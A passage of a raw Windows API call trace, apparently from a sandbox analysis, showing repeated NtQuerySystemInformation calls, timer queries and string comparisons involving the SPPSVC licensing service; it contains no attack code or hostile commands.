ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd070, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf60, Length=0x50, ResultLength=0x0) [0273.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0273.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0273.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdb0, Length=0x28, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x20, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce90, Length=0x38, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x20, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x28, ResultLength=0x0) [0273.222] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0273.222] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcef0, Length=0x50, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x28, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x28, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0273.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0273.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf50 | out: lpSystemTimeAsFileTime=0xf7a68fcf50*(dwLowDateTime=0x353a03d0, dwHighDateTime=0x1d63874)) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf40, Length=0x28, ResultLength=0x0) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0273.244] GetTickCount () returned 0x1184757 [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0273.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0273.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0273.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0273.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0273.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 